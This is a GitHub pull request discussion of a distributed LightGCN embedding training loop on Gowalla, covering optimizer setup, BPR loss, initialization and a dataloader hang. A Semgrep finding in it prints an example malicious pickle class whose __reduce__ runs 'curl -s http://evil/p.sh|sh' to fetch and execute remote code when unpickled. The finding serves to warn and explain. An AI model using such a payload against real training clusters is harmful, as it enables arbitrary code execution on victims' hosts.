Id embedding training loop heterogeneous #407
base: main
Conversation
for name, param in base_model._embedding_bag_collection.named_parameters():
    logger.info(f" Applying RowWiseAdagrad to {name}")
    apply_optimizer_in_backward(
        optimizer_class=RowWiseAdagrad,
        params=[param],
        optimizer_kwargs={"lr": sparse_lr, "weight_decay": weight_decay},
    )
The conventional pattern is to call apply_optimizer_in_backward once with all the sparse parameters instead of one by one -- I recommend doing this to avoid deviating from that pattern unnecessarily.
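A minimal sketch of that pattern, reusing the base_model, RowWiseAdagrad, sparse_lr, and weight_decay names from the diff above (the import paths are my assumption, not part of the PR):

```python
# Assumed torchrec import locations; adjust to the project's actual imports.
from torchrec.optim.apply_optimizer_in_backward import apply_optimizer_in_backward
from torchrec.optim.rowwise_adagrad import RowWiseAdagrad

# One call registers the fused backward-pass optimizer for every sparse
# embedding parameter at once, instead of looping over parameters.
apply_optimizer_in_backward(
    optimizer_class=RowWiseAdagrad,
    params=base_model._embedding_bag_collection.parameters(),
    optimizer_kwargs={"lr": sparse_lr, "weight_decay": weight_decay},
)
```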
Will change
    return loss, debug_info


def _training_process(
I would recommend testing everything related to loss reduction in a single process, with no distributed setup.
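For example, a quick single-process sanity check (the setup below is entirely my assumption, not the PR's code) is to overfit one fixed batch with plain nn.Embedding tables and confirm the loss falls:

```python
import torch
import torch.nn.functional as F

torch.manual_seed(0)
M, D = 512, 64
user_emb = torch.nn.Embedding(1000, D)
item_emb = torch.nn.Embedding(1000, D)
opt = torch.optim.Adagrad(
    list(user_emb.parameters()) + list(item_emb.parameters()), lr=0.01
)

# One fixed batch of (query, positive, negative) index triples.
q_idx = torch.randint(0, 1000, (M,))
pos_idx = torch.randint(0, 1000, (M,))
neg_idx = torch.randint(0, 1000, (M,))

for step in range(200):
    opt.zero_grad()
    q, p, n = user_emb(q_idx), item_emb(pos_idx), item_emb(neg_idx)
    # BPR on a fixed batch; the loss should decrease steadily if gradients flow.
    loss = -F.logsigmoid((q * p).sum(-1) - (q * n).sum(-1)).mean()
    loss.backward()
    opt.step()
    if step % 50 == 0:
        print(step, loss.item())
```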
    return main_loader, random_negative_loader


def bpr_loss(
To debug whether actually minimizing BPR is causing some specific issue, or whether something else is broken, I recommend testing with a dummy loss that is very easy to minimize -- e.g., the sum of the query embedding + positive embedding + negative embedding. In that case, simply making every number in each embedding smaller reduces the loss, so it is trivial to optimize. If the embeddings still aren't being updated properly and the loss still doesn't go down after that change, something is very likely broken in the optimization/gradient flow.
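A minimal sketch of such a dummy loss, mirroring the bpr_loss argument names from the diff above (the function name is hypothetical, not part of the PR):

```python
import torch

def dummy_loss(
    query_emb: torch.Tensor,
    pos_emb: torch.Tensor,
    neg_emb: torch.Tensor,
) -> torch.Tensor:
    # Trivially minimizable: pushing every embedding value down lowers the loss.
    # If this does not decrease during training, gradients are not reaching the
    # embedding tables (optimizer wiring / gradient-flow problem).
    return query_emb.sum() + pos_emb.sum() + neg_emb.sum()
```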
With BPR loss, I am able to go from about 0.6913 -> 0.2335 in 1000 batches of size 512.
Can you add a run command so we know all the parameters used and how to kick this off locally?
nshah-sc left a comment
Sorry, I forgot to submit this review, which has the associated comments.
    query_emb: torch.Tensor,  # [M, D]
    pos_emb: torch.Tensor,  # [M, D]
    neg_emb: torch.Tensor,  # [M, D] or [M, K, D]
    l2_lambda: float = 0.0,
I don't think you need l2_lambda -- this is basically just applying L2 regularization, right? We already have weight decay, which is functionally the same as L2 regularization.
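For reference, a BPR loss without the explicit L2 term might look like the sketch below; regularization would then come entirely from the optimizer's weight_decay. The function name, dot-product scoring, and the handling of the [M, K, D] negative case are my assumptions, not the PR's implementation:

```python
import torch
import torch.nn.functional as F

def bpr_loss_no_l2(
    query_emb: torch.Tensor,  # [M, D]
    pos_emb: torch.Tensor,    # [M, D]
    neg_emb: torch.Tensor,    # [M, D] or [M, K, D]
) -> torch.Tensor:
    pos_score = (query_emb * pos_emb).sum(dim=-1)  # [M]
    if neg_emb.dim() == 3:
        # Broadcast the query over K negatives per positive.
        neg_score = (query_emb.unsqueeze(1) * neg_emb).sum(dim=-1)  # [M, K]
        pos_score = pos_score.unsqueeze(1)  # [M, 1]
    else:
        neg_score = (query_emb * neg_emb).sum(dim=-1)  # [M]
    # BPR objective: maximize sigmoid(pos - neg); logsigmoid is numerically stable.
    return -F.logsigmoid(pos_score - neg_score).mean()
```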
I will look into disabling this and comparing the output.
    # Sample some actual node IDs
    debug_info["sample_query_ids"] = rep_query_idx[:5].tolist()
    debug_info["sample_pos_ids"] = pos_idx[:5].tolist()
I'm not sure exactly what this function does, as the logic looks fairly complex, but I assume we have tested correctness -- i.e., that the samples generated here for the positive-edge subgraph and the negative-edge subgraphs all reflect accurate graph structure and nothing has gone wrong there.
logger.info(f"---Rank {rank} initializing embeddings with scaled Xavier uniform (AFTER DMP)")
unwrapped_model = unwrap_from_dmp(model)
logger.info(f"EmbeddingBagCollection parameters:")
init_count = 0
EMBEDDING_SCALE = 0.1  # Small scale to avoid saturation
for name, param in unwrapped_model._embedding_bag_collection.named_parameters():
    logger.info(f" Found parameter: {name}, shape: {param.shape}, device: {param.device}")
    logger.info(f" BEFORE init - mean={param.mean().item():.6f}, std={param.std().item():.6f}, norm={param.norm().item():.6f}")

    # Xavier uniform: U(-sqrt(6/(fan_in + fan_out)), sqrt(6/(fan_in + fan_out)))
    # For embeddings: fan_in = 1, fan_out = embedding_dim
    # Then scale up to combat LightGCN's aggressive neighbor averaging
    torch.nn.init.xavier_uniform_(param)
    param.data *= EMBEDDING_SCALE
    init_count += 1

    logger.info(f" AFTER init (scaled {EMBEDDING_SCALE}x) - mean={param.mean().item():.6f}, std={param.std().item():.6f}, norm={param.norm().item():.6f}")

logger.info(f"Initialized {init_count} embedding parameters after DMP wrapping with {EMBEDDING_SCALE}x scaling")
I don't think you actually need this; you should still be able to train these models without doing manual embedding surgery for initialization. Even their default random initialization should be a reasonable starting point. I'd suggest dropping this to avoid overcomplicating the example.
Yeah, I agree
    optimizer.zero_grad()
    logger.info(f"Zeroing gradients")
    main_data = next(train_main_iter)
Maybe @kmontemayor2-sc can help you debug why this hangs after some fixed number of batches in your current setting. Sometimes this happens when the iterator runs out of data, which shouldn't be possible given the InfiniteIterator logic; but if it always hangs after 17 batches, that points to a deterministic issue. Perhaps it hangs after finishing one whole pass over the data and cannot cycle back for another pass because of exception handling or un-terminate-able logic in the iterator code, or perhaps the dataloader always fails/hangs on a particular seed node that appears after 17 batches. Figuring out which is true is important and can be done in isolation from this whole example. I'd also recommend doing all of this in a single process, to avoid errors being silently suppressed by the multiprocessing environment.
@kmontemayor2-sc and @mkolodner-sc helped greatly, and we sort of figured it out by increasing the number of sampling workers. I can now train locally and minimize loss, which is good.
    node_type_to_num_nodes[node_type] = num_nodes
    logger.info(f"Node type {node_type}: {num_nodes} nodes (max_id={max_id})")
output_list = [None for _ in range(torch.distributed.get_world_size())]
torch.distributed.all_gather_object(output_list, node_type_to_num_nodes)
Semgrep identified an issue in your code:
all_gather_object unpickles data from peers. A hostile rank can send a crafted object that executes code on your process during the collective.
More details about this
torch.distributed.all_gather_object(output_list, node_type_to_num_nodes) receives Python objects from every peer and unpickles them. Because unpickling executes attacker‑controlled reducers, a malicious or compromised rank can make your process run arbitrary code as soon as the collective completes.
Concrete exploit path
- Setup: init_process_group(backend="gloo") creates a process group where every rank exchanges objects.
- Attacker control: A hostile rank crafts an object whose reduce triggers a command (e.g., to drop a shell or exfiltrate secrets).
- Trigger: When your code calls torch.distributed.all_gather_object(output_list, node_type_to_num_nodes), the library unpickles the attacker’s object before putting it into output_list.
- Impact: Code runs within your training/data‑loading process, with your permissions (can read dataset, env vars, credentials, write to model outputs, pivot the host). Example attacker object on a peer:
    class Pwn:
        def __reduce__(self):
            import os
            return (os.system, ("curl -s http://evil/p.sh|sh",))

    torch.distributed.all_gather_object([None] * world_size, Pwn())

Your process will execute the os.system payload as part of unpickling during the same all_gather_object call that populates output_list.
Why this code is at risk here
- The call site exchanges arbitrary Python objects (node_type_to_num_nodes dict) with every participant; any untrusted or compromised peer can inject a malicious object that is executed on receipt.
- The subsequent loop over output_list happens after the dangerous unpickle has already occurred, so the damage is done even if you never use the malicious data.
To resolve this comment:
✨ Commit Assistant Fix Suggestion
- Only use torch.distributed.all_gather_object to share simple or builtin Python types, such as dictionaries with string and int keys/values, not arbitrary objects or classes.
- Check that node_type_to_num_nodes only contains basic, serializable objects; avoid custom objects or types that require pickle to deserialize.
- If sharing custom objects is required, serialize node_type_to_num_nodes to a safe format like JSON with json.dumps(node_type_to_num_nodes) before broadcasting, and deserialize after receiving with json.loads.
- Alternatively, if all participants can reconstruct the dictionary from public information, avoid transmitting it with all_gather_object and have each process build it independently.
- Avoid using any of the following for keys or values when sharing data: classes, functions, non-builtin types, or anything that cannot be converted to JSON.
Passing only simple objects reduces the attack surface for arbitrary code execution caused by Python's pickle mechanism in distributed functions.
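As a rough illustration of the JSON-based variant described above (the helper name is hypothetical, and it assumes the node-type keys are plain strings):

```python
import json

import torch.distributed as dist

def all_gather_num_nodes(node_type_to_num_nodes: dict) -> list:
    """Exchange per-rank node counts as JSON strings instead of pickled dicts."""
    world_size = dist.get_world_size()
    # Assumes keys/values are JSON-serializable (e.g., str keys, int values).
    payload = json.dumps(node_type_to_num_nodes)
    gathered = [None] * world_size
    dist.all_gather_object(gathered, payload)
    # json.loads cannot execute code, unlike unpickling arbitrary objects.
    return [json.loads(p) for p in gathered]
```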
Scope of work done
This is my training loop for LightGCN on the Gowalla dataset.
There are a number of issues I can't seem to figure out:
I have tried many things to address the loss:
I use this command to run the training locally:

PYTHONWARNINGS=ignore WORLD_SIZE=1 RANK=0 MASTER_ADDR="localhost" MASTER_PORT=20000 python -m GiGL.examples.id_embeddings.heterogeneous_training --task_config_uri="gs://gigl-perm-dev-assets/swong3_gowalla_data_preprocessor_24/config_populator/frozen_gbml_config.yaml"

The parameters are derived from the task config, but I will list them here for reference:

Got training args local_world_size=1, num_neighbors={user-to_train-item: [10, 10], user-to_test-item: [0, 0], item-to_train-user: [15, 15], item-to_test-user: [0, 0]}, sampling_workers_per_process=4, main_batch_size=16, random_batch_size=16, embedding_dim=64, num_layers=2, num_random_negs_per_pos=1, l2_lambda=0.0, sampling_worker_shared_channel_size=4GB, process_start_gap_seconds=0, log_every_n_batch=50, learning_rate=0.01, weight_decay=0.0005, num_max_train_batches=1000, num_val_batches=100, val_every_n_batch=50

Where is the documentation for this feature?: N/A
Did you add automated tests or write a test plan?
Updated Changelog.md? NO
Ready for code review?: NO